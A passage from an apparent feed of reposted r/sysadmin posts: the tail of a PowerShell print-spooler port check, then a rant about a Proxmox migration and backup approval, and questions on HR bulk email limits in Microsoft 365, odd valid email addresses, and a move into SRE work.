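    Ok       = [bool]($listen -and $listen.OwningProcess -eq $spooler.ProcessId)
}
```

Run it in an elevated PowerShell session on each client and on the server; any row with `Ok` false shows where a machine differs from what the batch file sets.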


Reddit Sysadmin

I did it, I've sent that angry but still professionally sounding mail to the higher ups.

Hi my fellow Sysadmins! I'm just a lone IT wolf here with a very busy IT manager. After getting out of today's meeting every last bit of my patience was gone, the drive back home was quiet and finally I got home and decided to send my thoughts via a mail, here is the mail quoted:

After today’s ISO review meeting, I felt it was important to share a short follow up from IT side.

Over the past months I’ve spent a significant amount of time including evenings and weekends to successfully migrate our infrastructure from VMware to Proxmox. This wasn’t just a technical task, it was a strategic move aimed at reducing long term costs and keeping the company away from unnecessary licensing expenses from VMware now owned by Broadcom.

This is already paying off for the company and will continue to do so over the coming years.

That’s why I was honestly a bit disappointed with the way today’s discussion focused only on “the missing documentation or this is taking too long” and didn’t seem to recognise the amount of work that has already been completed to get us here.
IT is not “waiting” on anything, we’ve actively been building the foundation to switch over to Proxmox and we are finally here.

I genuinely want to keep moving forward and get this fully completed, but I also hope the work done so far is acknowledged. IT may look expensive for MT but these are just basic necessities to keep an on-premise enterprise level network up and running and most importantly updated.

That said, I stayed a bit longer today and completed the Backup Documentation and it was attached as PDF. It includes all required elements (RPO/RTO, retention periods, restore testing and quarterly audit checklist) and is now ready for review.

Important: we still need management approval for the NAS or a separate U1 server for Proxmox Backup Server in order to actually implement this plan and finalize this ISO control section.

Without one of these pieces of hardware, IT simply cannot implement the required backup infrastructure, no matter how much documentation is produced.

Btw this said company was running VMware v6.0 till last week that over completed the migration over to Proxmox.

I've been only 10 years into IT, and today was it. I've had enough guys, it feels like no one cares how much effort we are putting in to keep everything running smooth and top notch! From the firewall to the bare basics like good quality monitors for the workstations. Everything looks like another expense from IT again, it's running why update it?

Man yes thank you all for hearing my rant tonight.
And yeah I stayed calm in the meeting while I was boiling up a bit from the inside.

https://redd.it/1mu4yjx
@r_systemadmin


Reddit Sysadmin

annual budgets for one thing. Because, unfortunately - people have to eat too and keep the lights on. And no, the cloud is not cheaper in this case, if in any and not a solution to any and every problem. It will just spread out the expenses, but won't liquidate them. And you for sure don't want certain data in the cloud.

Perhaps my opinion is controversial, perhaps it will lead to a major number of downvotes. But that's the sad truth and the reality we live in. We will fine organizations like hospitals already in financial deficit and struggling...because they have no money. And those hospitals are struggling, because...the same governments that will fine them give them no money. It's a paradox. Or we all will turn a blind eye and the compliance will be only on paper and security breaches and entire organizations and government institutions will continue to be regularly paralyzed by such attacks.

It's almost like (figuratively speaking) demanding the crippled to run or you will beat them as punishment and take away their last money for food from them.

https://redd.it/1mtxv8w
@r_systemadmin


Reddit Sysadmin

Custom internal email to 10K+ users

We're a Microsoft 365 shop.

I've poked around a little, but thought I might ask this question here. HR wants to send an individual email to 10K+ people. The email will contain benefits information that's individualized. They would like to use mail merge to send these, but our Defender anti-spam policy stops after they reach their daily limit of XXX emails and blocks the HR person's account until IT intervenes. They can't do any of the normal things to get around this policy like a distribution list because each email is customized. How do most organizations handle needs like this?

Copilot suggests replacing the Anti-Spam policy and adding a custom one that excludes the users that need this feature. I'm wondering if there is a better way.

Our HRIS system is UKG Pro, I wonder if it can do that emailing. If so, what module is it so that I can see if we have that module.

How does your organization handle something like this?

https://redd.it/1mtv8j1
@r_systemadmin


Reddit Sysadmin

Everyone knows what an email address is, right?

Saw this on Bluesky: https://bsky.app/profile/samwho.dev/post/3lwmf4y5kys2w

Direct link: https://e-mail.wtf/

I know sysadmins (especially those who've had to herd MTAs and not just MUAs) will score high or even perfect on this quiz, so I figured I would pass it along.

I scored 18/21 though, not sure how these are valid email addresses, and the quiz doesn't offer what RFC and where affirms or refutes each example:

* ` maybe-like-this @example.com` (leading/trailing space for local part is fine?)
* `fed-up-yet@ example.com ` (leading/trailing space for domain part is fine?)
* `""@example.com` (empty local part should be invalid, but escaping it makes it fine?)

https://redd.it/1mtt1su
@r_systemadmin


Reddit Sysadmin

I went from SysAdmin, to SaaS Admin, now I want to go SRE. Career advice?

General Disclaimer: I have no college degree. All of my tech experience started in the DoD and now I'm in the civilian sector (I have about ten years in this career field now).


As the title states, I started as a traditional SysAdmin. On site infrastructure, active directory, VMware, etc. I work for a company now that has shifted and is now a primary SaaS toolset (zoom, google workspace) and I just....don't really enjoy it anymore.


I want to get into cloud computing/SRE, and I was wondering if any folks here have made that transition? What are your daily/weekly/monthly duties like? What tools do you use? What are skill gaps that you wish you had?

https://redd.it/1mtnyon
@r_systemadmin
